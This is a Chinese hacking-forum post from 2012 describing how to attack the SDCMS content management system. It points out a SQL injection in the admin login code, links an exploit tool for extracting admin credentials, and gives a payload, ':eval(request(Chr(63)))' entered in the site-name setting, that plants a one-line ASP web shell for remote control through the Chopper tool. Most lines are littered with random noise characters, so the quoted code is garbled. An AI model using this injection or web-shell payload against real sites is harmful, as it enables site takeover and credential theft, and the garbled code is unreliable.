作者:T00LS 鬼哥0 c" l. l4 C6 j3 B9 f$ O4 U
漏洞文件:后台目录/index.asp- t$ [ \8 s, C/ U. C* f
3 X: j) Y- X4 t; R
Sub Check0 M( ^+ L2 n% s( f
Dim username,password,code,getcode,Rs+ v( k9 {8 B' M9 ~/ O+ b
IF Check_post Then Echo "1禁止从外部提交数据!":Exit Sub% T6 R. g" B$ W/ E
username=FilterText(Trim(Request.Form("username")),1)( I9 a; R) L" f2 s3 u! C* z4 f* e3 \
password=FilterText(Trim(Request.Form("password")),1)
7 y2 ~2 {/ Z& q9 k" \5 E code=Trim(Request.Form("yzm"))
: j. z# S/ ^0 [( a getcode=Session("SDCMSCode")! ]0 F- b9 K, W+ I5 ]1 o
IF errnum>=loginnum Then Echo "系统已禁止您今日再登录":died
/ D3 H" O- h% r+ z' ^: u IF code="" Then Alert "验证码不能为空!","javascript:history.go(-1)" ied# @3 {3 \! Q5 G% r% Z1 J/ s
IF code<>"" And Not Isnumeric(code) Then Alert "验证码必须为数字!","javascript:history.go(-1)"ied' _" \9 j6 {2 [
IF code<>getcode Then Alert "验证码错误!","javascript:history.go(-1)"ied- O, T1 s# m( N5 a5 \) x
IF username="" or password="" Then
! [9 t8 [5 m; o) t1 N; M Echo "用户名或密码不能为空"ied
, y) s7 Y0 d5 ^ a: @ Else
# A0 ]2 }% J' M3 R4 q$ M Set Rs=Conn.Execute("Select Id,Sdcms_Name,Sdcms_Pwd,isadmin,alllever,infolever From Sd_Admin Where Sdcms_name='"&username&"' And Sdcms_Pwd='"&md5(password)&"'")9 t+ v3 L6 J$ k/ r2 x4 i. \% n
IF Rs.Eof Then
: s9 h" \1 \( P AddLog username,GetIp,"登录失败",1
& k# I7 ]8 Z- o# a3 x$ E! b Echo "用户名或密码错误,今日还有 "&loginnum-errnum&" 次机会"
& \& s) q2 n0 S. s+ p9 I Else
. C ]. Y; i, l' A1 O) K, { @4 V Add_Cookies "sdcms_id",Rs(0)
1 T) l6 i" H; A/ o! L0 j w: l Add_Cookies "sdcms_name",username
: y: h. R! c k( v- v1 N1 n Add_Cookies "sdcms_pwd",Rs(2)+ r8 o8 m5 u3 U. H- Y( W
Add_Cookies "sdcms_admin",Rs(3)
' ~ l/ O4 ]8 {8 ]) Y: }1 A Add_Cookies "sdcms_alllever",Rs(4)7 L5 b. T8 x* `7 S
Add_Cookies "sdcms_infolever",Rs(5)
, W1 H# g6 m3 ~# m' W a: [$ N- _ Conn.Execute("Update Sd_Admin Set logintimes=logintimes+1,LastIp='"&GetIp&"' Where id="&Rs(0)&"")
1 a: e5 b. l9 w1 S; q; g" R/ B AddLog username,GetIp,"登录成功",1
& Y0 a* r2 l7 q- Z q3 Q5 n9 e '自动删除30天前的Log记录# g' H% Y6 @( q+ v# S) ^9 G. q6 B5 {
IF Sdcms_DataType Then0 E2 a1 X- c$ ?1 c! R7 S
Conn.Execute("Delete From Sd_Log Where DateDiff('d',adddate,Now())>30")
( g* z4 ]: V6 M9 [6 T. y3 _9 [ Else
& ^; f* g- ?. `3 \9 A) v3 r) r+ q Conn.Execute("Delete From Sd_Log Where DateDiff(d,adddate,GetDate())>30")
9 }! [* {3 d' x& R# w8 O: g0 e End IF" }/ f, y: t4 u1 E5 W) D
Go("sdcms_index.asp")5 Z. z; i1 ?$ D1 J
End IF
9 @& ` ?+ c) f Rs.Close
, x! r. t& \- z3 K; ~7 [8 ^ Set Rs=Nothing
+ u$ O. v6 \# F/ k$ B. \ End IF4 u2 y) W- Q$ ^2 C
End Sub& H, T# ~' i7 C/ q( d
; V' b- k& V7 e2 c+ w6 p) l’我们可以看到username是通过FilterText来过滤的。我们看看FilterText的代码" j/ t& q% Q+ @ k% P0 z5 O7 N
' g# i4 f$ H$ F" i" U& [: EFunction FilterText(ByVal t0,ByVal t1)
/ M) L E# c5 E; y IF Len(t0)=0 Or IsNull(t0) Or IsArray(t0) Then FilterText="":Exit Function, n+ i: F6 q( ?+ {. O6 P; A; }
t0=Trim(t0)
; k+ ^. w+ ]3 o' l' M4 g/ h& l Select Case t1
& @% s+ K/ x0 B$ P; k Case "1"* d: y5 \2 |5 G# q$ l
t0=Replace(t0,Chr(32),"")" P7 x& T# M2 K* L
t0=Replace(t0,Chr(13),"")4 R5 y- x; Q( o/ g
t0=Replace(t0,Chr(10)&Chr(10),"")/ c! h7 b/ Q+ O- }
t0=Replace(t0,Chr(10),"")- f* b+ `, p& T8 K' P: ]: p
Case "2"
8 C R' f% c. I- Z t0=Replace(t0,Chr(8),"")'回格. O% B8 B9 M i6 ]# m" _
t0=Replace(t0,Chr(9),"")'tab(水平制表符)
3 q- l' G' D/ A t0=Replace(t0,Chr(10),"")'换行- h6 f1 D( M N0 r
t0=Replace(t0,Chr(11),"")'tab(垂直制表符)2 e( ? D7 N) r* g
t0=Replace(t0,Chr(12),"")'换页9 ]% F5 n: X ^2 x9 N1 Y
t0=Replace(t0,Chr(13),"")'回车 chr(13)&chr(10) 回车和换行的组合
" k$ y" V1 ]5 j' ]8 Q t0=Replace(t0,Chr(22),"")
: g# V7 p4 s& ?+ ~2 {! B9 o$ ] t0=Replace(t0,Chr(32),"")'空格 SPACE
3 h6 j+ O; A; t; @' @( n t0=Replace(t0,Chr(33),"")'!
- z8 M8 C9 d5 h' x8 P, o# j t0=Replace(t0,Chr(34),"")'"0 v+ \ t. e; l2 l5 B4 M# D3 B& W2 o- K
t0=Replace(t0,Chr(35),"")'#! R. ~! o7 v! o- m. V
t0=Replace(t0,Chr(36),"")'$8 O! `' u& d3 U8 F' o0 i
t0=Replace(t0,Chr(37),"")'%; ^, }- ~( a: k3 G
t0=Replace(t0,Chr(38),"")'&+ ^- q& j0 M* q) |/ g" R
t0=Replace(t0,Chr(39),"")''
7 h9 m$ x+ ^' r4 ^, d) i T4 ^* V t0=Replace(t0,Chr(40),"")'(9 u; S0 O; t$ m& o3 S$ Z0 C
t0=Replace(t0,Chr(41),"")')+ h j) ]8 _# a1 Z/ G
t0=Replace(t0,Chr(42),"")'*
( p. k. a S: s9 D0 j% G t0=Replace(t0,Chr(43),"")'+/ w3 H/ R" h, B$ V8 Z% g
t0=Replace(t0,Chr(44),"")',+ e- Z6 N Y. ^" N5 i# Z
t0=Replace(t0,Chr(45),"")'-' D3 s/ E4 B% d& \' I% h% v
t0=Replace(t0,Chr(46),"")'.
+ D2 S: k) O, Z6 p t0=Replace(t0,Chr(47),"")'/8 j/ T9 ^; n- R5 ?
t0=Replace(t0,Chr(58),"")':- N! Q4 g: d0 e G
t0=Replace(t0,Chr(59),"")';
6 ]1 M, K# ?+ {8 s8 A. _ t0=Replace(t0,Chr(60),"")'< t0=Replace(t0,Chr(61),"")'= t0=Replace(t0,Chr(62),"")'>6 f8 l) y- D/ R7 o
t0=Replace(t0,Chr(63),"")'?
. R o0 k$ @ D/ S3 a t0=Replace(t0,Chr(64),"")'@( K3 \( p8 H# F+ z5 U
t0=Replace(t0,Chr(91),"")'\9 P; [9 ^5 x% Y) c, [
t0=Replace(t0,Chr(92),"")'\7 f5 Q/ n! Y, ?
t0=Replace(t0,Chr(93),"")']1 e* g6 D: I$ d _: y1 u
t0=Replace(t0,Chr(94),"")'^( R( }- R& c+ }! Q: I
t0=Replace(t0,Chr(95),"")'_
) @% g3 C- ^- i9 ]7 Y# X5 s/ @ t0=Replace(t0,Chr(96),"")'`( R7 \4 Z# p# \5 x; P- Q
t0=Replace(t0,Chr(123),"")'{/ A4 f& j8 K F' I3 X5 q$ f
t0=Replace(t0,Chr(124),"")'|% a' b: F4 R( e1 x
t0=Replace(t0,Chr(125),"")'}5 K, q$ _' a4 f9 u: Z' N
t0=Replace(t0,Chr(126),"")'~+ v7 o, l5 V: w% I7 y+ `
Case Else
; O' }1 t+ G1 X( | t0=Replace(t0, "&", "&")8 S X3 L+ e3 m1 O+ \9 L( v; ~
t0=Replace(t0, "'", "'")
( O" B& E0 n& w$ n2 L$ N* l, b t0=Replace(t0, """", """)3 _* { e$ D9 X$ o7 h: {6 {$ A! l
t0=Replace(t0, "<", "<") t0=Replace(t0, ">", ">")0 z1 i0 b1 x8 W* k2 ^" ~
End Select5 @/ C, G: t J+ m* l; i. C2 p
IF Instr(Lcase(t0),"expression")>0 Then
* m' w3 A0 C: v# t% l" ? t0=Replace(t0,"expression","e­xpression", 1, -1, 0)
1 A7 h) h G! S1 D u% I! ?: u; m3 r End If
8 H3 L) |6 \% b5 ?" W3 E8 \) k# \ FilterText=t0
; L3 [+ P& G3 Y3 k0 n( zEnd Function
" D; a% ], o7 `0 Q J# ]% K7 I( r7 \$ n2 \+ t, @+ Y1 H: \
看到没。直接参数是1 只过滤( @" P0 L( W. O! l( F1 ?% Y. z
t0=Replace(t0,Chr(32)," "), B& a1 Q5 {( I: i( Z
t0=Replace(t0,Chr(13),"")9 W* n1 N/ o T1 ^" C
t0=Replace(t0,Chr(10)&Chr(10),"7 X, a Q5 `' H' i+ z4 s9 `
")3 _# D: |$ V0 p8 _2 j# G. _, m: Y
t0=Replace(t0,Chr(10),"
1 |5 ?& J5 {* k# U. |5 Y# I")
7 y8 T# T: K' }; Q: H& Z2 _漏洞导致可以直接拿到后台帐号密码。SDCMS默认后台地址/admin/如果站长改了后台路径,那么请自行查找!5 C+ b& z" K( d- `, \
EXP利用工具下载 (此工具只能在XP上运行):sdcms-EXP4 W8 s2 |6 d- P8 Y
* J7 C$ E$ c u) I- ]1 z测试:. w: I# U! U1 N
, R; s4 @1 Y5 g9 Q8 d5 p. x$ h( m8 {; h; A/ |; ~' o( }3 e1 Q4 P1 S
现在输入工具上验证码,然后点OK
! c$ }( B/ R0 E# S4 t7 Z; f4 }3 B6 Z9 S: _* _2 X& u) f
7 l3 R" O0 Y& c& b. j. N' ^
看到我们直接进入后台管理界面了,呵呵!0 b. O B2 s9 a+ ?6 |! v1 g$ n
- |+ p! z8 M ]0 J2 s9 z9 g; O8 G! s- {: d! ]4 E& b
5 l$ V B6 k$ R/ g5 `这样直接进入后台了。。。。' I" b! d' r/ y2 }- k8 T x0 _
: z- t- p, t R
* c( Y; ~! W/ M c
0 i2 Z; z! H1 l! y; j9 c) VSDCMS提权:
& W6 k& V/ C) \) |! I
4 [. S1 p: _- ^4 j' J7 e V方法1:访问:/后台目录/sdcms_set.asp 在 网站名称:后面加个 “:eval(request(Chr(63)))’ 即可,直接写一句话进去。 写入到/inc/Const.asp 一句话连接密码是?
) @7 ^0 ~- g: ^& e% {/ y6 [+ x. C0 A) T7 M5 D
: y" r4 A; s$ Q2 H
$ ~5 d( R* H K, L" q/ bOK,现在用菜刀连接下!; Z* f" ` E+ a- F' Z) Z+ R" a1 L
+ o% | ]9 d/ B! l6 g0 V$ @2 D k
/ w' R, t- D, x1 l; f0 A& \0 u( @! R- D \# p
) {+ A7 y1 O5 C/ f( ]4 u0 G+ ]( k
' K- I2 {- R' w6 K |
发表于 2012-11-9 20:57:02
收藏
支持
反对